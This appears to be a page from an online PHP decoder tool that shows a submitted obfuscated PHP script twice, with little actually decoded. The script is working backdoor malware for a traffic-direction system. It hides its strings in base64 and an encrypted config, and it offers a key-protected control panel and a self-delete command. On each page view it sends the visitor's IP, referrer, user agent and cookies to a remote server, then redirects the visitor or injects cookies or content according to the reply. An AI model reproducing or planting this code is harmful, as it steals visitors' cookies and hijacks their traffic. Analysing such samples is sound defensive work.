Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?$cfg='wOkHggQHv5z2wY1xvYFJnvWXYOOuX1Fjd9ynQ8AoomPirZWQqpOdDYJt8XOAkPTUwUYUxAh3XtcPN94s/x..

Decoded Output download

<?$cfg='wOkHggQHv5z2wY1xvYFJnvWXYOOuX1Fjd9ynQ8AoomPirZWQqpOdDYJt8XOAkPTUwUYUxAh3XtcPN94s/xYlAVo/Ov5Fhk6Yfk0k2l6oHo6LaIvlIOZmkGs4bkhbuJveOGMz7dAZVsS51easCZu0fxLqoOaJiVP4vIyLH5l6Vyh4zaT/y1KKU/NJCVv3RCwhQjulg/ooGyh4P0euSKXmYeiauVEleA1hpKVonmDUww=='; ?> 
<? function _1146785986($i){$a=Array('S2Y3OGhHQ1pQYg==','TnJDSFo=','','SCo=','bW9kZQ==','Y29uZmln','a2V5','a2V5','PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9','a2V5','PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i','dXJs','Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=','aXA=','Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=','a2V5','Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=','bGlu','Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==','aWQ=','Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==','c2V0Y29uZmln','a2V5','a2V5','Lw==','U0NSSVBUX05BTUU=','dXJs','cHRkcw==','aXA=','cHRkc2lw','bGlu','cHRv','aWQ=','cGVzZGlk','a2V5','cGtleQ==','dw==','','U2F2ZWQuCg==','a2lsbA==','a2V5','a2V5','Nzc3','U0NSSVBUX0ZJTEVOQU1F','U0NSSVBUX0ZJTEVOQU1F','b2sK','Lw==','dXJs','aXA=','aXA=','aHR0cDovLw==','SFRUUF9IT1NU','U0NSSVBUX05BTUU=','UkVNT1RFX0FERFI=','bm8=','SFRUUF9YX0ZPUldBUkRFRF9GT1I=','eWVz','SFRUUF9VU0VSX0FHRU5U','a2V5','Jg==','a2V5','PQ==','UVVFUllfU1RSSU5H','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','IEhUVFAvMS4wDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQo=','ZG8=','ZG8=','IA==','bGlu','MjAw','bGlu','Oi8v','aHR0cA==','SFRUUC8xLjEgMzAyIEZvdW5k','TG9jYXRpb246IA==','Y29vaw==','Jg==','PQ==','ZWNobw==');return base64_decode($a[$i]);} ?><?php error_reporting(0);$key=_1146785986(0);function string_cpt($String,$Password){$Salt=_1146785986(1);$StrLen=strlen($String);$Seq=$Password;$Gamma=_1146785986(2);while(strlen($Gamma)<$StrLen){$Seq=pack(_1146785986(3),sha1($Gamma .$Seq .$Salt));$Gamma.=substr($Seq,0,8);}return $String^$Gamma;}$c=unserialize(string_cpt(base64_decode($cfg),$key));$mode=$_REQUEST[_1146785986(4)];if($mode== _1146785986(5)AND $c[_1146785986(6)]==$_REQUEST[_1146785986(7)]){echo _1146785986(8) .$_REQUEST[_1146785986(9)] ._1146785986(10) .$c[_1146785986(11)] ._1146785986(12) .$c[_1146785986(13)] ._1146785986(14) .$c[_1146785986(15)] ._1146785986(16) .$c[_1146785986(17)] ._1146785986(18) .$c[_1146785986(19)] ._1146785986(20);die();}if($mode== _1146785986(21)AND $c[_1146785986(22)]==$_REQUEST[_1146785986(23)]){$sn=explode(_1146785986(24),$_SERVER[_1146785986(25)]);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$strng=$getlpa[0];$file=file($scr);for($i=0;$i<sizeof($file);$i++)if($i==0){$c[_1146785986(26)]=$_POST[_1146785986(27)];$c[_1146785986(28)]=$_POST[_1146785986(29)];$c[_1146785986(30)]=$_POST[_1146785986(31)];$c[_1146785986(32)]=$_POST[_1146785986(33)];$c[_1146785986(34)]=$_POST[_1146785986(35)];$cfg=base64_encode(string_cpt(serialize($c),$key));$file[$i]="<?\$cfg='$cfg'; ?>
";}$fp=fopen($scr,_1146785986(36));if(fputs($fp,implode(_1146785986(37),$file)))die(_1146785986(38));fclose($fp);}if($mode== _1146785986(39)AND $c[_1146785986(40)]==$_REQUEST[_1146785986(41)]){chmod(_1146785986(42),$_SERVER[_1146785986(43)]);if(unlink($_SERVER[_1146785986(44)]))die(_1146785986(45));}$dom=explode(_1146785986(46),$c[_1146785986(47)]);$dom=$dom[2];$dhost=$dom;if($c[_1146785986(48)]){$dom=$c[_1146785986(49)];}$fp=fsockopen($dom,80,$errno,$errstr,2);if(!$fp){$res=1;}else{$t_dom=urlencode(_1146785986(50) .$_SERVER[_1146785986(51)] .$_SERVER[_1146785986(52)]);$t_ref=urlencode($_SERVER[HTTP_REFERER]);$t_ip=urlencode($_SERVER[_1146785986(53)]);$t_prox=_1146785986(54);if($_SERVER[_1146785986(55)]){$t_prox=_1146785986(56);}$t_agent=urlencode($_SERVER[_1146785986(57)]);foreach($_COOKIE as $c[_1146785986(58)]=>$val){$t_cookie=$t_cookie ._1146785986(59) .$c[_1146785986(60)] ._1146785986(61) .$val;}$t_cookie=urlencode($t_cookie);if(empty($t_cookie)){$t_cookie=urlencode($_SERVER[_1146785986(62)]);}$out=_1146785986(63) .$c[_1146785986(64)] ._1146785986(65) .$t_dom ._1146785986(66) .$t_ref ._1146785986(67) .$t_ip ._1146785986(68) .$t_prox ._1146785986(69) .$t_agent ._1146785986(70) .$t_cookie ._1146785986(71) .$c[_1146785986(72)] ._1146785986(73);$out .= _1146785986(74) .$dhost ._1146785986(75);$out .= _1146785986(76);fwrite($fp,$out);while(!feof($fp)){$str=fgets($fp,128);$ch.=$str;if($str== _1146785986(77)&& empty($he)){$he=_1146785986(78);}if($he== _1146785986(79)){$goto.=$str;}}fclose($fp);}$goto=substr($goto,2);$ch=explode(_1146785986(80),$ch);if($res){$goto=$c[_1146785986(81)];}if($ch[1]== _1146785986(82)){}else{$goto=$c[_1146785986(83)];}$gotoe=explode(_1146785986(84),$goto);If($gotoe[0]== _1146785986(85)){header(_1146785986(86));header(_1146785986(87) .$goto);}$goto_body=substr($goto,7);If($gotoe[0]== _1146785986(88)){$gotoee=explode(_1146785986(89),$goto_body);foreach($gotoee as $setcook){$set=explode(_1146785986(90),$setcook);setcookie($set[0],$set[1]);}}If($gotoe[0]== _1146785986(91)){echo $goto_body;} ?>

Did this file decode correctly?

Original Code

<?$cfg='wOkHggQHv5z2wY1xvYFJnvWXYOOuX1Fjd9ynQ8AoomPirZWQqpOdDYJt8XOAkPTUwUYUxAh3XtcPN94s/xYlAVo/Ov5Fhk6Yfk0k2l6oHo6LaIvlIOZmkGs4bkhbuJveOGMz7dAZVsS51easCZu0fxLqoOaJiVP4vIyLH5l6Vyh4zaT/y1KKU/NJCVv3RCwhQjulg/ooGyh4P0euSKXmYeiauVEleA1hpKVonmDUww=='; ?>
<? function _1146785986($i){$a=Array('S2Y3OGhHQ1pQYg==','TnJDSFo=','','SCo=','bW9kZQ==','Y29uZmln','a2V5','a2V5','PGZvcm0gbmFtZT0iZm9ybTEiIG1ldGhvZD0icG9zdCIgYWN0aW9uPT9tb2RlPXNldGNvbmZpZyZrZXk9','a2V5','PjxwcmU+ClREUzogICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzIiB2YWx1ZT0i','dXJs','Ij4gIFREUyBJUDogIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdGRzaXAiIHZhbHVlPSI=','aXA=','Ij4KS0VZOiAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBrZXkiIHZhbHVlPSI=','a2V5','Ij4gIFJlc2VydmU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwdG8iIHZhbHVlPSI=','bGlu','Ij4KSUQ6ICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9InBlc2RpZCIgdmFsdWU9Ig==','aWQ=','Ij4gIDxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9IlN1Ym1pdCIgdmFsdWU9Im9rIj48L3ByZT4KPC9mb3JtPg==','c2V0Y29uZmln','a2V5','a2V5','Lw==','U0NSSVBUX05BTUU=','dXJs','cHRkcw==','aXA=','cHRkc2lw','bGlu','cHRv','aWQ=','cGVzZGlk','a2V5','cGtleQ==','dw==','','U2F2ZWQuCg==','a2lsbA==','a2V5','a2V5','Nzc3','U0NSSVBUX0ZJTEVOQU1F','U0NSSVBUX0ZJTEVOQU1F','b2sK','Lw==','dXJs','aXA=','aXA=','aHR0cDovLw==','SFRUUF9IT1NU','U0NSSVBUX05BTUU=','UkVNT1RFX0FERFI=','bm8=','SFRUUF9YX0ZPUldBUkRFRF9GT1I=','eWVz','SFRUUF9VU0VSX0FHRU5U','a2V5','Jg==','a2V5','PQ==','UVVFUllfU1RSSU5H','R0VUIA==','dXJs','P2RvbT0=','JnJlZj0=','JmlwPQ==','JnByb3g9','JmFnZW50PQ==','JmNvb2tpZT0=','JmVzZGlkPQ==','aWQ=','IEhUVFAvMS4wDQo=','SG9zdDog','DQo=','Q29ubmVjdGlvbjogQ2xvc2UNCg0K','DQo=','ZG8=','ZG8=','IA==','bGlu','MjAw','bGlu','Oi8v','aHR0cA==','SFRUUC8xLjEgMzAyIEZvdW5k','TG9jYXRpb246IA==','Y29vaw==','Jg==','PQ==','ZWNobw==');return base64_decode($a[$i]);} ?><?php error_reporting(0);$key=_1146785986(0);function string_cpt($String,$Password){$Salt=_1146785986(1);$StrLen=strlen($String);$Seq=$Password;$Gamma=_1146785986(2);while(strlen($Gamma)<$StrLen){$Seq=pack(_1146785986(3),sha1($Gamma .$Seq .$Salt));$Gamma.=substr($Seq,0,8);}return $String^$Gamma;}$c=unserialize(string_cpt(base64_decode($cfg),$key));$mode=$_REQUEST[_1146785986(4)];if($mode== _1146785986(5)AND $c[_1146785986(6)]==$_REQUEST[_1146785986(7)]){echo _1146785986(8) .$_REQUEST[_1146785986(9)] ._1146785986(10) .$c[_1146785986(11)] ._1146785986(12) .$c[_1146785986(13)] ._1146785986(14) .$c[_1146785986(15)] ._1146785986(16) .$c[_1146785986(17)] ._1146785986(18) .$c[_1146785986(19)] ._1146785986(20);die();}if($mode== _1146785986(21)AND $c[_1146785986(22)]==$_REQUEST[_1146785986(23)]){$sn=explode(_1146785986(24),$_SERVER[_1146785986(25)]);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$strng=$getlpa[0];$file=file($scr);for($i=0;$i<sizeof($file);$i++)if($i==0){$c[_1146785986(26)]=$_POST[_1146785986(27)];$c[_1146785986(28)]=$_POST[_1146785986(29)];$c[_1146785986(30)]=$_POST[_1146785986(31)];$c[_1146785986(32)]=$_POST[_1146785986(33)];$c[_1146785986(34)]=$_POST[_1146785986(35)];$cfg=base64_encode(string_cpt(serialize($c),$key));$file[$i]="<?\$cfg='$cfg'; ?>\n";}$fp=fopen($scr,_1146785986(36));if(fputs($fp,implode(_1146785986(37),$file)))die(_1146785986(38));fclose($fp);}if($mode== _1146785986(39)AND $c[_1146785986(40)]==$_REQUEST[_1146785986(41)]){chmod(_1146785986(42),$_SERVER[_1146785986(43)]);if(unlink($_SERVER[_1146785986(44)]))die(_1146785986(45));}$dom=explode(_1146785986(46),$c[_1146785986(47)]);$dom=$dom[2];$dhost=$dom;if($c[_1146785986(48)]){$dom=$c[_1146785986(49)];}$fp=fsockopen($dom,80,$errno,$errstr,2);if(!$fp){$res=1;}else{$t_dom=urlencode(_1146785986(50) .$_SERVER[_1146785986(51)] .$_SERVER[_1146785986(52)]);$t_ref=urlencode($_SERVER[HTTP_REFERER]);$t_ip=urlencode($_SERVER[_1146785986(53)]);$t_prox=_1146785986(54);if($_SERVER[_1146785986(55)]){$t_prox=_1146785986(56);}$t_agent=urlencode($_SERVER[_1146785986(57)]);foreach($_COOKIE as $c[_1146785986(58)]=>$val){$t_cookie=$t_cookie ._1146785986(59) .$c[_1146785986(60)] ._1146785986(61) .$val;}$t_cookie=urlencode($t_cookie);if(empty($t_cookie)){$t_cookie=urlencode($_SERVER[_1146785986(62)]);}$out=_1146785986(63) .$c[_1146785986(64)] ._1146785986(65) .$t_dom ._1146785986(66) .$t_ref ._1146785986(67) .$t_ip ._1146785986(68) .$t_prox ._1146785986(69) .$t_agent ._1146785986(70) .$t_cookie ._1146785986(71) .$c[_1146785986(72)] ._1146785986(73);$out .= _1146785986(74) .$dhost ._1146785986(75);$out .= _1146785986(76);fwrite($fp,$out);while(!feof($fp)){$str=fgets($fp,128);$ch.=$str;if($str== _1146785986(77)&& empty($he)){$he=_1146785986(78);}if($he== _1146785986(79)){$goto.=$str;}}fclose($fp);}$goto=substr($goto,2);$ch=explode(_1146785986(80),$ch);if($res){$goto=$c[_1146785986(81)];}if($ch[1]== _1146785986(82)){}else{$goto=$c[_1146785986(83)];}$gotoe=explode(_1146785986(84),$goto);If($gotoe[0]== _1146785986(85)){header(_1146785986(86));header(_1146785986(87) .$goto);}$goto_body=substr($goto,7);If($gotoe[0]== _1146785986(88)){$gotoee=explode(_1146785986(89),$goto_body);foreach($gotoee as $setcook){$set=explode(_1146785986(90),$setcook);setcookie($set[0],$set[1]);}}If($gotoe[0]== _1146785986(91)){echo $goto_body;} ?>

Function Calls

None

Variables

None

Stats

MD5	dcaf7f3b9bc8886dbf3b19630ec4409c
Eval Count	0
Decode Time	97 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats